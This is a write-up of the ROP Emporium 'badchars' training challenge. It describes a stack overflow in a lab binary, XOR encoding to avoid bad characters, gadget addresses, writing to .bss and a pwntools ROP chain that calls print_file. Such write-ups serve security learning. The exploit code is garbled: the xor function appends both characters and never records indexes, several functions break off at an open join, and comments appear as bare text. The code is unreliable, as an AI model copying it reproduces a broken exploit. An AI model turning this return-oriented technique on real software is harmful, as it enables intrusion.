Date: 01.03.2024

ROP Emporium - badchars

Task: Read flag by invoking print_file

Initial analysis

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  • x86-64 binary, LSB
  • Utilizes which is attached to this task

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  • No canaries - good for us
  • Unfortunately, NX is enabled, so ret2shellcode is impossible to conduct

Vulnerable entrypoint

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Binary takes input from user and processes it in dangerous way, because providing a long input resulted in segmentation fault.

Vulnerable code probably is located in .so file, since I didn’t spot any input handling in assessed binary.

Above assumptions are confirmed by reverse-engineering in ghidra.

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Binary reserves 32 bytes for user input, however in read function we can see that, binary takes 0x200 bytes of input into 32 byte array, which results in (stack) buffer overflow.

Exploitation strategy

Considering binary protections and type of vulnerability, we can plan our exploit. It will be a ROP chain, since we can’t put our own shellcode. Again, our aim is to print the content of flag with print_file function, so we need to:

  1. Write file name flag.txt to memory (because it doesn’t exist in binary nor shared object)
  2. Invoke print_file with flag.txt as arg.

Seems to be simple, however there are badchars in this binary: x,g,a,., so we can’t simply write flag.txt into memory. We need to encode that string with some gadgets, the simplest way to do this is XOR.

ropper -f badchars --search "xor"

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First gadget seems to be most interesting, since we can xor anything that is at address stored in R15 with key stored in R14 (r14b has only byte length, so our key will be small).

XOR function

XOR_indexes variable will keep indexes of flag.txt that will be decrypted during runtime.

def xor(data,key):
        xor_indexes = []
        xored_data = ""
        for index, char in enumerate(data):
                if char in badchars:
                        xored_c = chr(ord(char) ^ key)
                        xored_data += xored_c
                        xored_data += char
        return bytes(xored_data.encode("latin-1")), xor_indexes

Assume that key=2.In a result, we will write to memory: flce,tzt.

Writing to memory

To write string to memory we need several things:

  • address of memory, where we are writing our string
  • assembler instruction responsible for writing data into registers and into memory

Finding memory address

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We are interested only in sections where we can write data. The most promising sections are .bss and .data. However, .bss is better choice, because:

  1. This section is initialized with 0s, .data stores some data, so there is possibility of unexpected behaviour if we overwrite this section.
  2. It has perfect size, because our string is indeed 8 bytes long.

So let’s write bss address to our exploit ('bss_addr':0x0601038).

Finding gadgets

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I marked the most interesting gadgets:

  • mov qword ptr [r13],r12 - moving content from r12 to location stored in r13, thans to that, we will be able to write encoded flag into memory
  • pop r12; pop r13; pop r14; pop r15 - popping values from stack into registers, thanks to that, we will be able to write our values into registers
  • pop rdi - because we need to provide flag.txt as argument to function print_file, first argument (according to x86-64 calling convention) must be stored in RDI

The last thing we need to find is print_file address, with pwndbg you can do that with p print_file.

Determining offset needed to overflow

In pwndbg execute following command:

cyclic -a bcdefhijklmnopqrstuvwyz -n 8

Above command will create cyclic charset that will be sent into binary. Remebmer to exclude badchars (-a option)! After running it, take the value from RBP and execute following command to determine offset.

cyclic -a bcdefhijklmnopqrstuvwyz -l fbbbbbbb

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Total offset will be 32+8=40.

Building exploit


Simple function to overflow the buffer.

def overflow(offset):
        return b"A"*offset

Writing into .bss

Follwing function will:

  • Pop values from stack into r12-r15
  • Write encoded string into R12
  • Write .bss address to R13
  • Write garbage into r14, r15 - because we don’t need that registers now
  • Utilize mov gadget, which writes content of R12 into address specified in R13 (in this case: .bss section).
def write_to_bss(data, xor_key=2):
        return b''.join([

Inversing XOR at runtime

Following function will:

  • Pop values from stack into r12-r15
  • Write garbage into r12, r13 - because we don’t need that registers now
  • Write xor_key into R14
  • Write one encoded letter of string stored in .bss into R15
  • Finally perform xor operation
def inverse_xor(xor_indexes, xor_key=2):
        stage = b''
        for indx in xor_indexes:
                stage += p64(gadgets["pop_r12-r15"])
                stage += p64(0xdeadbeefdeadbeef)
                stage += p64(0xdeadbeefdeadbeef)
                stage += p64(xor_key)
                stage += p64(gadgets["bss_addr"] + indx)
                stage += p64(gadgets["xor_gadget"])
        return stage

Calling print_file

Following function pops RDI from stack, which allows us to write anything to that register. In our case we want to pass pointer to our string (pass address to string), because in RDI is stored first argument of function (look at x86-64 calling convention).

def call_print_file():
        return b''.join([

Creating final ROP chain

This functions, takes all previous function and connects them into one chain.

If you are not Ubuntu user please delete ubuntu_gadget

def create_rop_chain(offset, data, key=2):
        return b''.join([
                p64(gadgets["ubuntu_gadget"]), # add if your machine is ubuntu

Final Exploit

from pwn import *

badchars = ["x","g","a","."]
gadgets = {'ubuntu_gadget':0x04004ee, 'bss_addr':0x0601038, 'pop_r12-r15':0x040069c,'mov_gadget':0x0400634, 'xor_gadget': 0x0400628, 'print_file':0x0400510, 'pop_rdi':0x04006a3}

def overflow(offset):
        return b"A"*offset

pop r12, ...,r15 from stack
write xored data to r12
write virtual bss address to r13
garbage for r14
garbage for r15
copy value from r12 to bss
def write_to_bss(data, xor_key=2):
        return b''.join([

pop r12,...,r15 from stack
write garbage to r12,r13
write xor_key to r14
write char to be xored, into r15
xor r15 with r14
def inverse_xor(xor_indexes, xor_key=2):
        stage = b''
        for indx in xor_indexes:
                stage += p64(gadgets["pop_r12-r15"])
                stage += p64(0xdeadbeefdeadbeef)
                stage += p64(0xdeadbeefdeadbeef)
                stage += p64(xor_key)
                stage += p64(gadgets["bss_addr"] + indx)
                stage += p64(gadgets["xor_gadget"])
        return stage

pop_rdi from stack
write address of "flag.txt" string bo RDI (as arg)
call print_file
def call_print_file():
        return b''.join([

def xor(data,key):
        xor_indexes = []
        xored_data = ""
        for index, char in enumerate(data):
                if char in badchars:
                        xored_c = chr(ord(char) ^ key)
                        xored_data += xored_c
                        xored_data += char
        return bytes(xored_data.encode("latin-1")), xor_indexes

def create_rop_chain(offset, data, key=2):
        return b''.join([
                p64(gadgets["ubuntu_gadget"]), # add if your machine is ubuntu

if __name__ == '__main__':
        p = process("./badchars")
        payload = create_rop_chain(40, "flag.txt")


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